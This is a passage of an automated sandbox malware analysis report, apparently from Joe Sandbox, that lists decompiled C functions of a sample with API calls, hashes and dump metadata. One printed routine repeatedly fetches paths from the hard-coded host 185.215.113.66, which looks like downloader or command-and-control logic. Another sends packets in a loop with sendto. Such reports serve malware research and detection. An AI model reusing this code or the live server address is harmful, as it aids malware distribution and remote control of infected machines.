                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040B8E4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B840: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040B880
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B840: CloseHandle.KERNEL32(?), ref: 0040B899
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0040B93F
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040B97C
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040B987
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 0040B98E
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040B9A2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2251373460-0
                                                                                                                                                                                                                                                                  • Opcode ID: cd02b4e7ea184323fa94dc359a7904105169c9492878c592a52418cb996932f0
                                                                                                                                                                                                                                                                  • Instruction ID: 002a0dc9329e903af3e7deb21e8176c7de0be147670cf5542ad48bfb447a56cc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd02b4e7ea184323fa94dc359a7904105169c9492878c592a52418cb996932f0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C33110B4900208EFDB14DF98D889B9E77B5FF48304F008568F945A7391D778AA95CF94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E004076A0(signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				L0040EB18();
                                                                                                                                                                                                                                                                  				_a4 = _a4 | _a4;
                                                                                                                                                                                                                                                                  				_a8 = _a8 | _a8;
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				L0040EB18();
                                                                                                                                                                                                                                                                  				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                                                                                                                                                                                                  				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				L0040EB18();
                                                                                                                                                                                                                                                                  				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                                                                                                                                                                                                  				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                                                                                                                                                                                                  				return _a4;
                                                                                                                                                                                                                                                                  			}



                                                                                                                                                                                                                                                                  0x004076ad
                                                                                                                                                                                                                                                                  0x004076be
                                                                                                                                                                                                                                                                  0x004076c7
                                                                                                                                                                                                                                                                  0x004076ca
                                                                                                                                                                                                                                                                  0x004076e0
                                                                                                                                                                                                                                                                  0x004076fc
                                                                                                                                                                                                                                                                  0x00407705
                                                                                                                                                                                                                                                                  0x00407708
                                                                                                                                                                                                                                                                  0x0040771e
                                                                                                                                                                                                                                                                  0x0040773a
                                                                                                                                                                                                                                                                  0x00407743
                                                                                                                                                                                                                                                                  0x00407746
                                                                                                                                                                                                                                                                  0x00407752

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 673498613-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                  • Instruction ID: 5c97871b7af6941603d612d690eec0be109c5698e055a0afcac2a9503b7b8ad0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2114F326005186B9B10EF5EC48268ABBE6EFC43A0B14C176FC2CCF319D634E9514BD8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                                                                                  			E00405A20() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				signed int _v44;
                                                                                                                                                                                                                                                                  				char _v148;
                                                                                                                                                                                                                                                                  				intOrPtr _v152;
                                                                                                                                                                                                                                                                  				intOrPtr _v156;
                                                                                                                                                                                                                                                                  				intOrPtr _v160;
                                                                                                                                                                                                                                                                  				intOrPtr _v164;
                                                                                                                                                                                                                                                                  				intOrPtr _v168;
                                                                                                                                                                                                                                                                  				signed int _v172;
                                                                                                                                                                                                                                                                  				signed char _t35;
                                                                                                                                                                                                                                                                  				void* _t45;
                                                                                                                                                                                                                                                                  				void* _t46;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v168 = 0x410130;
                                                                                                                                                                                                                                                                  				_v164 = 0x410134;
                                                                                                                                                                                                                                                                  				_v160 = 0x410138;
                                                                                                                                                                                                                                                                  				_v156 = 0x41013c;
                                                                                                                                                                                                                                                                  				_v152 = 0x410140;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					Sleep(0x3e8);
                                                                                                                                                                                                                                                                  					_v172 = 0;
                                                                                                                                                                                                                                                                  					while(_v172 < 5) {
                                                                                                                                                                                                                                                                  						Sleep(0x3e8);
                                                                                                                                                                                                                                                                  						_push( *((intOrPtr*)(_t45 + _v172 * 4 - 0xa4)));
                                                                                                                                                                                                                                                                  						_push("http://185.215.113.66/");
                                                                                                                                                                                                                                                                  						wsprintfA( &_v148, "%s%s");
                                                                                                                                                                                                                                                                  						_t35 = E0040D160( &_v148, _t45 + _v172 * 4 - 0x28);
                                                                                                                                                                                                                                                                  						_t46 = _t46 + 0x18;
                                                                                                                                                                                                                                                                  						if((_t35 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                  							E0040D210( &_v148, 0);
                                                                                                                                                                                                                                                                  							_t46 = _t46 + 8;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v172 = _v172 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(0xdbba0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}























                                                                                                                                                                                                                                                                  0x00405a29
                                                                                                                                                                                                                                                                  0x00405a32
                                                                                                                                                                                                                                                                  0x00405a35
                                                                                                                                                                                                                                                                  0x00405a38
                                                                                                                                                                                                                                                                  0x00405a3b
                                                                                                                                                                                                                                                                  0x00405a3e
                                                                                                                                                                                                                                                                  0x00405a41
                                                                                                                                                                                                                                                                  0x00405a44
                                                                                                                                                                                                                                                                  0x00405a47
                                                                                                                                                                                                                                                                  0x00405a4a
                                                                                                                                                                                                                                                                  0x00405a4d
                                                                                                                                                                                                                                                                  0x00405a57
                                                                                                                                                                                                                                                                  0x00405a61
                                                                                                                                                                                                                                                                  0x00405a6b
                                                                                                                                                                                                                                                                  0x00405a75
                                                                                                                                                                                                                                                                  0x00405a7f
                                                                                                                                                                                                                                                                  0x00405a84
                                                                                                                                                                                                                                                                  0x00405a8a
                                                                                                                                                                                                                                                                  0x00405aa5
                                                                                                                                                                                                                                                                  0x00405ab3
                                                                                                                                                                                                                                                                  0x00405ac6
                                                                                                                                                                                                                                                                  0x00405ac7
                                                                                                                                                                                                                                                                  0x00405ad8
                                                                                                                                                                                                                                                                  0x00405af3
                                                                                                                                                                                                                                                                  0x00405af8
                                                                                                                                                                                                                                                                  0x00405b01
                                                                                                                                                                                                                                                                  0x00405b0c
                                                                                                                                                                                                                                                                  0x00405b11
                                                                                                                                                                                                                                                                  0x00405b11
                                                                                                                                                                                                                                                                  0x00405a9f
                                                                                                                                                                                                                                                                  0x00405a9f
                                                                                                                                                                                                                                                                  0x00405b1b
                                                                                                                                                                                                                                                                  0x00405b1b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleep$wsprintf
                                                                                                                                                                                                                                                                  • String ID: %s%s$http://185.215.113.66/
                                                                                                                                                                                                                                                                  • API String ID: 3195947292-2646931437
                                                                                                                                                                                                                                                                  • Opcode ID: db831dabfc09dcc662437302b10c0b813bdcb2051b2d4d57cf9ac82af9635b94
                                                                                                                                                                                                                                                                  • Instruction ID: 9179b70c853e6521bba14d82c2a0a6f7832d18f48ba41fe3fbda8a5cdd5ecee7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db831dabfc09dcc662437302b10c0b813bdcb2051b2d4d57cf9ac82af9635b94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C210C70E00318EFCB60DF64CD45B9EBBB4AB49304F5081AAD54DB6281DB795A88CF59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                                                                                                  			E0040D8F0(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                                                                                                                                                                                                  				short _v6;
                                                                                                                                                                                                                                                                  				short _v10;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v20;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				int* _v24;
                                                                                                                                                                                                                                                                  				char _v25;
                                                                                                                                                                                                                                                                  				char _v29;
                                                                                                                                                                                                                                                                  				int* _v52;
                                                                                                                                                                                                                                                                  				char _v53;
                                                                                                                                                                                                                                                                  				short _t30;
                                                                                                                                                                                                                                                                  				short _t35;
                                                                                                                                                                                                                                                                  				long _t38;
                                                                                                                                                                                                                                                                  				int* _t45;
                                                                                                                                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                                                                                                                                  				void* _t60;
                                                                                                                                                                                                                                                                  				int _t64;
                                                                                                                                                                                                                                                                  				long _t67;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t50 = _a4;
                                                                                                                                                                                                                                                                  				_t64 = __eax;
                                                                                                                                                                                                                                                                  				_t30 = 0;
                                                                                                                                                                                                                                                                  				_v25 = 0;
                                                                                                                                                                                                                                                                  				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                                                                                                                                                                                                  					L12:
                                                                                                                                                                                                                                                                  					return _t30;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t60 = __eax + 4;
                                                                                                                                                                                                                                                                  					_t45 = E00408840(_t60);
                                                                                                                                                                                                                                                                  					_t6 =  &(_t45[1]); // 0x4
                                                                                                                                                                                                                                                                  					_v24 = _t45;
                                                                                                                                                                                                                                                                  					 *_t45 = _t64;
                                                                                                                                                                                                                                                                  					memcpy(_t6, _a8, _t64);
                                                                                                                                                                                                                                                                  					_v18 = 0;
                                                                                                                                                                                                                                                                  					_v14 = 0;
                                                                                                                                                                                                                                                                  					_v10 = 0;
                                                                                                                                                                                                                                                                  					_v6 = 0;
                                                                                                                                                                                                                                                                  					_t35 = _a16;
                                                                                                                                                                                                                                                                  					_v20 = 2;
                                                                                                                                                                                                                                                                  					__imp__#9(_t35);
                                                                                                                                                                                                                                                                  					_v22 = _t35;
                                                                                                                                                                                                                                                                  					_v20 = _a12;
                                                                                                                                                                                                                                                                  					if(_t60 == 0) {
                                                                                                                                                                                                                                                                  						L10:
                                                                                                                                                                                                                                                                  						_v29 = 1;
                                                                                                                                                                                                                                                                  						E00408990(_t45);
                                                                                                                                                                                                                                                                  						return _v29;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						while(1) {
                                                                                                                                                                                                                                                                  							_t38 = _a4;
                                                                                                                                                                                                                                                                  							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10);
                                                                                                                                                                                                                                                                  							_t67 = _t38;
                                                                                                                                                                                                                                                                  							if(_t67 == 0xffffffff) {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                                                                                                                                                                                                  							_t60 = _t60 - _t67;
                                                                                                                                                                                                                                                                  							_t45 = _t45 + _t67;
                                                                                                                                                                                                                                                                  							if(_t60 != 0) {
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v53 = 1;
                                                                                                                                                                                                                                                                  								E00408990(_v52);
                                                                                                                                                                                                                                                                  								return _v53;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L13;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                                                                                                                                                  							E00408990(_v52);
                                                                                                                                                                                                                                                                  							_t30 = _v53;
                                                                                                                                                                                                                                                                  							goto L12;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t45 = _v52;
                                                                                                                                                                                                                                                                  							goto L10;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L13:
                                                                                                                                                                                                                                                                  			}






















                                                                                                                                                                                                                                                                  0x0040d8f9
                                                                                                                                                                                                                                                                  0x0040d8fe
                                                                                                                                                                                                                                                                  0x0040d900
                                                                                                                                                                                                                                                                  0x0040d903
                                                                                                                                                                                                                                                                  0x0040d909
                                                                                                                                                                                                                                                                  0x0040da0a
                                                                                                                                                                                                                                                                  0x0040da10
                                                                                                                                                                                                                                                                  0x0040d92d
                                                                                                                                                                                                                                                                  0x0040d92d
                                                                                                                                                                                                                                                                  0x0040d936
                                                                                                                                                                                                                                                                  0x0040d93d
                                                                                                                                                                                                                                                                  0x0040d941
                                                                                                                                                                                                                                                                  0x0040d945
                                                                                                                                                                                                                                                                  0x0040d947
                                                                                                                                                                                                                                                                  0x0040d94e
                                                                                                                                                                                                                                                                  0x0040d952
                                                                                                                                                                                                                                                                  0x0040d956
                                                                                                                                                                                                                                                                  0x0040d95a
                                                                                                                                                                                                                                                                  0x0040d95f
                                                                                                                                                                                                                                                                  0x0040d96b
                                                                                                                                                                                                                                                                  0x0040d970
                                                                                                                                                                                                                                                                  0x0040d979
                                                                                                                                                                                                                                                                  0x0040d97e
                                                                                                                                                                                                                                                                  0x0040d984
                                                                                                                                                                                                                                                                  0x0040d9e0
                                                                                                                                                                                                                                                                  0x0040d9e1
                                                                                                                                                                                                                                                                  0x0040d9e6
                                                                                                                                                                                                                                                                  0x0040d9f8
                                                                                                                                                                                                                                                                  0x0040d986
                                                                                                                                                                                                                                                                  0x0040d986
                                                                                                                                                                                                                                                                  0x0040d986
                                                                                                                                                                                                                                                                  0x0040d998
                                                                                                                                                                                                                                                                  0x0040d99e
                                                                                                                                                                                                                                                                  0x0040d9a3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9ad
                                                                                                                                                                                                                                                                  0x0040d9b3
                                                                                                                                                                                                                                                                  0x0040d9b5
                                                                                                                                                                                                                                                                  0x0040d9b9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9bb
                                                                                                                                                                                                                                                                  0x0040d9c0
                                                                                                                                                                                                                                                                  0x0040d9c5
                                                                                                                                                                                                                                                                  0x0040d9d7
                                                                                                                                                                                                                                                                  0x0040d9d7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9b9
                                                                                                                                                                                                                                                                  0x0040d9da
                                                                                                                                                                                                                                                                  0x0040d9fe
                                                                                                                                                                                                                                                                  0x0040da03
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9dc
                                                                                                                                                                                                                                                                  0x0040d9dc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d9dc
                                                                                                                                                                                                                                                                  0x0040d9da
                                                                                                                                                                                                                                                                  0x0040d984
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040D947
                                                                                                                                                                                                                                                                  • htons.WS2_32(?), ref: 0040D970
                                                                                                                                                                                                                                                                  • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040D998
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D9AD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                                                                                  • String ID: pdu
                                                                                                                                                                                                                                                                  • API String ID: 2164660128-2320407122
                                                                                                                                                                                                                                                                  • Opcode ID: 88a18a94d3bc78129496766a0c3d8ab97aedb5bcb2f353dcce8513fb367319d8
                                                                                                                                                                                                                                                                  • Instruction ID: d5c084f29bf55225ac582d60c416bdeb603a939ee1c87b6529a0d2a4f533a5e5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88a18a94d3bc78129496766a0c3d8ab97aedb5bcb2f353dcce8513fb367319d8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E3185766083419FC710DF69D880AABBBE4AF89714F04457EF9D897382D6349908CBE7
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409380(void* __eax) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				void* _t38;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if( *0x4139e4 == 0) {
                                                                                                                                                                                                                                                                  					return __eax;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v12 =  *0x4139e4 << 3;
                                                                                                                                                                                                                                                                  				_t38 = E00408840(_v12);
                                                                                                                                                                                                                                                                  				_v8 = _t38;
                                                                                                                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                                                                                                                  					_v20 = 0;
                                                                                                                                                                                                                                                                  					while(_v20 <  *0x4139e4) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v20 * 4)) + 4));
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v20 * 4)) + 8));
                                                                                                                                                                                                                                                                  						_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v16 = CreateFileW(0x4137a0, 0x40000000, 0, 0, 2, 2, 0);
                                                                                                                                                                                                                                                                  					if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						WriteFile(_v16, _v8, _v12,  &_v24, 0);
                                                                                                                                                                                                                                                                  						FlushFileBuffers(_v16);
                                                                                                                                                                                                                                                                  						CloseHandle(_v16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InterlockedExchange(0x4123b4, 0x3d);
                                                                                                                                                                                                                                                                  					return E00408990(_v8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t38;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x0040938d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040939c
                                                                                                                                                                                                                                                                  0x004093a3
                                                                                                                                                                                                                                                                  0x004093ab
                                                                                                                                                                                                                                                                  0x004093b2
                                                                                                                                                                                                                                                                  0x004093b8
                                                                                                                                                                                                                                                                  0x004093ca
                                                                                                                                                                                                                                                                  0x004093e8
                                                                                                                                                                                                                                                                  0x004093fe
                                                                                                                                                                                                                                                                  0x004093c7
                                                                                                                                                                                                                                                                  0x004093c7
                                                                                                                                                                                                                                                                  0x0040941e
                                                                                                                                                                                                                                                                  0x00409425
                                                                                                                                                                                                                                                                  0x00409439
                                                                                                                                                                                                                                                                  0x00409443
                                                                                                                                                                                                                                                                  0x0040944d
                                                                                                                                                                                                                                                                  0x0040944d
                                                                                                                                                                                                                                                                  0x0040945a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409469
                                                                                                                                                                                                                                                                  0x0040946f

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(004137A0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00409418
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00409439
                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(000000FF), ref: 00409443
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040944D
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(004123B4,0000003D), ref: 0040945A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 442028454-0
                                                                                                                                                                                                                                                                  • Opcode ID: b8ed7ca3bb06fc53ea3f5fb4403c24c03d2bc84ae1038eb0142838dadfe08794
                                                                                                                                                                                                                                                                  • Instruction ID: 450f0bf4d3de1bd92049d4cdc0ad236695143bdb7d06a53e7e3c0e4889a3cbca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8ed7ca3bb06fc53ea3f5fb4403c24c03d2bc84ae1038eb0142838dadfe08794
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C317FB4A00208EBCB10DF94D985BAEB770BB48701F108579E511B73D2C774AE05CF59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                                                                                                                  			E00407290(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                                                                                                                                                                                                  				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x0040729b
                                                                                                                                                                                                                                                                  0x0040729e
                                                                                                                                                                                                                                                                  0x004072aa
                                                                                                                                                                                                                                                                  0x004072ad
                                                                                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                                                                                  0x004072bc
                                                                                                                                                                                                                                                                  0x004072c8
                                                                                                                                                                                                                                                                  0x004072cb
